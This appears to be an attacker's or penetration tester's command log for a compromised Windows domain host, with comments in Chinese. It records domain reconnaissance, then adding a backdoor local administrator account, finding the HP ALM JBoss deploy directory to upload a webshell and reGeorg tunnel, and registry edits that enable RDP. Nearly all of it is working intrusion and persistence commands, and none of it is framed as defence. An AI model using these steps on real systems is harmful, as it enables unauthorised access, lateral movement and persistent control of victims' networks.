net user       //存在域用户，为域环境tasklist /svc  //不存在杀毒软件，但可能存在流量查杀软件ipconfig /all  //存在域：otr-ict.chn 且为内网环境netstat -an | findstr 3389 //未开启RDP服务setspn -q */*  //查看SPN信息，只有域控nltest /domain_trusts  //单域net user sis2212 [email protected] /add      //successnet localgroup administrators sis2212 /add    //success

#查询weblogic端口下的程序shell netstat -anb   //8181--》QCJavaService.exe    #查询程序对应的存放目录shell wmic process where name="QCJavaService.exe" get processid,executablepath,name//--》 C:\ProgramData\HP\ALM\JBoss\bin\QCJavaService.exe    #查询上传webshell的目录C:\ProgramData\HP\ALM\jboss\server\default\deploy\ROOT.war //这里直接上传peak马和regeorg文件
#备注：这里翻遍了磁盘目录，很是无语

#开启RDP服务reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /freg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
#查看端口号REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber